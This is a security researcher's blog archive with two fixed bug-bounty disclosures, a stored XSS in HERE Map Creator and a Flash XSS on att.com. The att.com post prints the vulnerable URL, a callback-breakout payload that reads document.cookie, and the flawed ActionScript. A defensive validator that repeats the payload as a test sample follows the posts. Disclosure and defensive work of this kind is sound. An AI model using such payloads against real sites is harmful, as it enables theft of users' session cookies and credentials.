Showing posts from October, 2013

Dangerous Persistent XSS at Here.com [FIX]

Here.com is a Nokia business unit that brings together Nokia's mapping and location assets under one brand. The technology of Here is based on a cloud-computing model, in which location data and services are stored on remote servers so that users have access to them regardless of which device they use.

HERE Map Creator is a service launched by Nokia in November 2012 to allow users to map their neighborhood. With this bug I could SAVE a road name with a payload on the map. Any user who tries to re-edit the street name will get this XSS. I reported a similar bug to Waza.com a few months ago.

Nokia Response:

Thanks to Nokia for starting this bug bounty program.

FLASH XSS AT ATT.COM [FIX]

I found a Flash XSS on AT&T's main domain where an attacker could steal users' credentials.

Vuln URL:

    http://www.att.com/media/en_US/scripts/JSAM/JSAM_VideoPlayer.swf?completeHandler= JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}// &source=https://www.wireless.att.com/home/video_progressive/video_marquees/B2CNDA-24-emerald-hp-marquee-bkd.mp4

Payload:

    JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//

Flash Vuln Code:

    public function videoPlayer_completeHandler(_arg1:VideoEvent):void {
        if (ExternalInterface.available) {
            // completeHandler is the value of the completeHandler URL parameter;
            // it is passed to the page's JavaScript as the function name without validation.
            ExternalInterface.call(completeHandler, ExternalInterface.objectID);
        } else {
            trace("JSAM_VideoPlayer cannot call completeHandler because ExternalInterface is not available.");
        }
    }

Proof:

After 2 months, AT&T Response:

I hope to be on the top 10 Award :)
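A defender-side check for the parameter abused above, as an added example that is not part of the original post or AT&T's code: it accepts `completeHandler` only when every supplied value is a plain dotted identifier on an allowlist, which is the same rule the SWF should apply before `ExternalInterface.call`. The names `ALLOWED_CALLBACKS`, `checkCallbackParam`, `audit` and the `example.test` URLs are assumptions made for illustration.

```javascript
// Added example (not the site's code): vet a SWF callback parameter.
// ALLOWED_CALLBACKS holds the only function names the page really exposes (assumed).
const ALLOWED_CALLBACKS = new Set(["JSAM.flashCompleteHandler"]);

// A callback name must be a dotted identifier path and nothing else:
// no parentheses, braces, semicolons, quotes, whitespace or comment markers.
const DOTTED_IDENTIFIER = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function checkCallbackParam(requestUrl, paramName = "completeHandler") {
  let values;
  try {
    // searchParams percent-decodes, so encoded variants are judged in decoded form.
    values = new URL(requestUrl).searchParams.getAll(paramName);
  } catch (err) {
    return { ok: false, reason: "unparseable URL" };
  }
  if (values.length === 0) return { ok: true, reason: "parameter absent" };
  // Check every occurrence: the parser in front of the SWF may pick first or last.
  for (const value of values) {
    if (!DOTTED_IDENTIFIER.test(value)) {
      return { ok: false, reason: "not a plain identifier path" };
    }
    if (!ALLOWED_CALLBACKS.has(value)) {
      return { ok: false, reason: "identifier not on allowlist" };
    }
  }
  return { ok: true, reason: "allowlisted callback" };
}

// Constructed sample requests (example.test is a placeholder host).
const BASE = "http://www.example.test/player.swf";
const SAMPLES = [
  BASE + "?completeHandler=JSAM.flashCompleteHandler&source=a.mp4",
  BASE + "?completeHandler=JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//&source=a.mp4",
  BASE + "?completeHandler=JSAM.flashCompleteHandler%29%3B%7D//&source=a.mp4",
  BASE + "?completeHandler=JSAM.flashCompleteHandler&completeHandler=console.log",
  BASE + "?source=a.mp4",
];

// Returns one verdict per URL, suitable for a request filter or a log review.
function audit(urls) {
  return urls.map((url) => ({ url, ...checkCallbackParam(url) }));
}

for (const row of audit(SAMPLES)) {
  console.log(row.ok ? "ALLOW" : "BLOCK", "-", row.reason, "-", row.url);
}
```
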